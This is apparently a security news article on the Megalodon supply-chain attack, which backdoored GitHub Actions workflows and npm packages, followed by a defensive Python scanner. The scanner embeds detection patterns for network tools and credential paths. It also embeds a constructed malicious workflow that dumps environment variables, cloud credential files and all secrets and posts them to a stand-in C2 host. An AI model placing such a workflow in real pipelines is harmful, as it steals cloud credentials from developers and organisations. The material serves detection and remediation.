
5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours
Why It Matters
The breach demonstrates how an automated supply-chain attack can silently infiltrate CI/CD pipelines at scale and turn the cloud credentials stored in them into a path to the infrastructure those credentials unlock. Prompt remediation is essential to protect both code integrity and the downstream packages and services that depend on compromised repositories.
Key Takeaways
- Megalodon altered 5,561 GitHub repositories with 5,718 fake updates.
- The attack planted backdoored .github/workflows/ci.yml GitHub Actions workflows.
- Tiledesk published seven infected npm versions (2.18.6 to 2.18.12).
- The malware exfiltrates AWS, GCP and Azure credentials to a C2 server.
- SafeDep advises immediately reverting the malicious changes and rotating credentials for affected repos.
Pulse Analysis
Supply-chain attacks have moved from occasional incidents to automated, high-velocity campaigns, and the Megalodon operation underscores that shift. By targeting the ubiquitous GitHub platform, the attackers exploited the trust developers place in CI/CD pipelines, inserting malicious workflow files that either run on every push or lie dormant until triggered through the GitHub API. The scale, over five thousand repositories in a single six-hour window, places this breach among the most extensive recorded, rivaling the contemporaneous TeamPCP intrusion that exploited a compromised VS Code extension.
Technically, Megalodon's two primary payloads, SysDiag and Optimize-Build, show a practiced use of GitHub Actions. SysDiag drops a .github/workflows/ci.yml file whose job runs a credential-stealing script on every push, so the theft happens inside a run that looks like ordinary CI. Optimize-Build overwrites existing system files and declares a workflow_dispatch trigger, so its job runs only when invoked manually or through the GitHub API and never shows up in the push-triggered build logs developers routinely inspect. The impact was visible in the Tiledesk case, where seven successive npm package versions (2.18.6 to 2.18.12) were published with embedded backdoors, potentially exposing downstream users to credential theft. The malware harvests AWS, Google Cloud and Azure keys and relays them to a C2 server; because those keys were provisioned for the CI job, the stolen copies carry the same access to linked cloud resources that the job had, with no further authentication required.
For development teams, the Megalodon episode is a stark reminder to treat third-party code changes, including changes to CI configuration, as potential attack vectors. Immediate steps include auditing recent commits for unauthorized or modified files under .github/workflows/, revoking and rotating every cloud credential the affected pipelines could read, tightening CI/CD permissions (least-privilege workflow tokens, pinned action versions), and requiring signed commits. Industry-wide, the incident is likely to accelerate adoption of provenance tooling and signed GitHub Actions, as organizations seek to verify the authenticity of code before it reaches production. Continuous monitoring and rapid incident response will remain essential to a resilient software supply chain.
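As an added example (not SafeDep's tooling or code from any affected project), the following Python script applies the workflow audit step above to the text of a workflow file: it extracts each `run:` step, flags one that both reads secrets, the job environment or on-disk cloud credentials and sends data off the runner, and checks every line for `toJSON(secrets)`, a download piped into a shell, base64-decoded payloads and a `workflow_dispatch` trigger. The two sample workflows and the hostname `c2.example.invalid` are constructed for the demonstration and are not the real Megalodon payload.

```python
"""Heuristic triage of GitHub Actions workflow text for the indicators in the
article: a run step that reads credentials and sends them off the runner,
wholesale secret dumping, download-piped-to-shell, obfuscated payloads, and an
API/manual (workflow_dispatch) trigger. Added example; samples are constructed."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule line_no evidence")  # rule, 1-based line, offending line

# Ways to send data out of the runner: curl/wget with a body or method flag, netcat/socat, PowerShell.
NET_SEND = re.compile(
    r"\b(?:curl|wget)\b[^\n]*?(?:\s-(?:d|F|T|X)\b"
    r"|--(?:data(?:-binary|-raw|-urlencode)?|form|upload-file|request)\b)"
    r"|\b(?:nc|ncat|socat)\b|Invoke-(?:WebRequest|RestMethod)")

# Reads of secrets, the job environment, or local cloud credential stores.
CRED_ACCESS = re.compile(
    r"\$\{\{\s*secrets\.|toJSON\(\s*secrets\s*\)"
    r"|(?:^|[;&|(\s])(?:env|printenv)\s*(?:[>|)]|$)"
    r"|~/\.aws|~/\.azure|\.config/gcloud|GOOGLE_APPLICATION_CREDENTIALS"
    r"|AWS_(?:ACCESS|SECRET|SESSION)_", re.M)

# Indicators checked on every individual line of the file.
LINE_RULES = [
    ("secrets-dump", re.compile(r"toJSON\(\s*secrets\s*\)")),
    ("remote-script-exec", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("obfuscated-payload", re.compile(r"base64\s+(?:-d|--decode)\b|\beval\b[^\n]*\$\(|(?:\\x[0-9a-fA-F]{2}){4,}")),
    ("manual-trigger", re.compile(r"\bworkflow_dispatch\b")),
]

RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(\|-?|>-?)?\s*(.*)$")


def run_blocks(text):
    """Yield (line_no, script) per `run:` step, keeping a `run: |` block scalar together."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_col, block, inline = len(m.group(1)), m.group(2), m.group(3)
        start, body = i + 1, [] if block else [inline]
        i += 1
        # A block scalar continues while lines are blank or indented past the `run` key.
        while block and i < len(lines) and (
                not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > key_col):
            body.append(lines[i].strip())
            i += 1
        yield start, "\n".join(body)


def scan_workflow(text):
    """Return the Findings for one workflow file's text, in line order."""
    findings = []
    for line_no, script in run_blocks(text):
        if NET_SEND.search(script) and CRED_ACCESS.search(script):
            findings.append(Finding("credential-exfil", line_no, (script.splitlines() or [""])[0]))
    for n, line in enumerate(text.splitlines(), 1):
        for rule, pat in LINE_RULES:
            if pat.search(line):
                findings.append(Finding(rule, n, line.strip()))
    return sorted(findings, key=lambda f: f.line_no)


# Constructed samples: an ordinary Node CI workflow, and one modelled on the attack
# described in the article (runs on push and by API, harvests credentials, posts to C2).
BENIGN_CI = """\
name: CI
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

MALICIOUS_CI = """\
name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Diagnostics
        run: |
          D=$(mktemp)
          env > "$D"
          cat ~/.aws/credentials ~/.config/gcloud/credentials.db >> "$D" 2>/dev/null
          echo '${{ toJSON(secrets) }}' >> "$D"
          curl -s -X POST --data-binary "@$D" https://c2.example.invalid/collect
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for f in scan_workflow(MALICIOUS_CI):
        print(f"line {f.line_no}: {f.rule:<18} {f.evidence}")
```

Feed it the files that changed recently, for example those listed by `git log --since="6 hours ago" --name-only --diff-filter=AM -- .github/workflows/`. Treat a hit as a triage lead rather than proof: legitimate deploy steps also combine curl with a secret, and a clean result only means none of these particular patterns appeared, so the rotation of credentials the pipeline could read should not wait on the scan.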